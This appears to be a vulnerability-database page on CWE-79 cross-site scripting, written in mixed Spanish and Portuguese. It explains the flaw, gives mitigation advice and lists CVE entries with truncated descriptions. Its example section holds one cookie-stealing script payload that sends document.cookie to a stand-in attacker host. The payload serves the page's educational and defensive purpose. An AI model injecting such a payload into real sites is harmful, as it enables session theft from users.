Fallos del tipo CWE-79

28.694 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2017-6511MEDIUMandrzuk/FineCMS before 2017-03-06 is vulnerable to a reflected XSS in index.php because of missing validation of the action parameter in appEPSS 0.7%CVE-2024-44778HIGHA reflected cross-site scripting (XSS) vulnerability in the parent parameter in the index page of vTiger CRM 7.4.0 allows attackers to execuEPSS 0.7%CVE-2022-22229HIGHParagon Active Assurance (Formerly Netrounds): Stored Cross-site Scripting (XSS) vulnerability in web administrationEPSS 0.7%CVE-2024-27838MEDIUMThe issue was addressed by adding additional logic. This issue is fixed in Safari 17.5, iOS 16.7.8 and iPadOS 16.7.8, iOS 17.5 and iPadOS 17EPSS 0.7%CVE-2024-40506HIGHCross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMHospitalitEPSS 0.7%CVE-2022-22748MEDIUMMalicious websites could have confused Firefox into showing the wrong origin when asking to launch a program and handling an external URL prEPSS 0.7%CVE-2022-2589MEDIUMCross-site Scripting (XSS) - Reflected in beancount/favaEPSS 0.7%CVE-2024-2692CRITICALSiYuan 3.0.3 - RCE via Server Side XSSEPSS 0.7%CVE-2019-15618—Missing escaping of HTML in the Updater of Nextcloud 15.0.5 allowed a reflected XSS when starting the updater from a malicious location.EPSS 0.7%CVE-2022-1938—Awin Data Feed < 1.8 - Unauthenticated Stored Cross-Site ScriptingEPSS 0.7%CVE-2021-42547MEDIUMreflected XSS in search functionality of WP Cloud Plugins - Out-of-the-BoxEPSS 0.7%CVE-2021-42549MEDIUMreflected XSS in search functionality of WP Cloud Plugins - Lets-BoxEPSS 0.7%CVE-2021-42548MEDIUMreflected XSS in search functionality of WP Cloud Plugins - Share-one-DriveEPSS 0.7%CVE-2021-42546MEDIUMReflected XSS in search functionality of WP Cloud Plugins - Use-Your-DriveEPSS 0.7%CVE-2026-32626CRITICALAnythingLLM has a Streaming Phase XSS to RCE via LLM Response InjectionEPSS 0.7%CVE-2026-88057MEDIUMAngular: Sanitization bypass via directive host bindings on concrete host elements in @angular/core and @angular/compilerEPSS 0.7%CVE-2021-24794—Connections Business Directory < 10.4.3 - Admin+ Stored Cross-Site ScriptingEPSS 0.7%CVE-2023-28599MEDIUMZoom clients prior to 5.13.10 contain an HTML injection vulnerability. A malicious user could inject HTML into their display name potentiaEPSS 0.7%CVE-2025-47110HIGHAdobe Commerce | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.7%CVE-2022-4710MEDIUMRoyal Elementor Addons <= 1.3.59 - Reflected Cross-Site ScriptingEPSS 0.7%